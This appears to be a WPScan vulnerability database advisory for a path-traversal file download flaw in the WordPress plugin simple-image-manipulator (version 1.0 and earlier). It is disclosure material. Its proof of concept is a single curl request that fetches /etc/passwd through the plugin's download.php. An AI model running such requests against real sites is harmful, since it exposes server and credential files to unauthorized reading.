simple-image-manipulator <= 1.0 - Remote File Download

Sign up to our free email alerts service for instant vulnerability notifications!

Description
In ./simple-image-manipulator/controller/download.php no checks are made to authenticate the user or sanitize input when determining file location.
Proof of Concept
$ curl  "http://www.vapidlabs.com/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"

Affects

Plugin simple-image-manipulator

References

EXPLOITDB 37753
URL http://www.vapid.dhs.org/advisory.php?v=147

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Submitter Larry W. Cashdollar
Submitter Website http://www.vapid.dhs.org
Submitter Twitter _larry0
Views 195
Verified No
WPVDB ID 8123

Timeline

Publicly Published 2015-08-02 (over 1 year ago)
Added 2015-08-03 (over 1 year ago)
Last Updated 2015-08-26 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.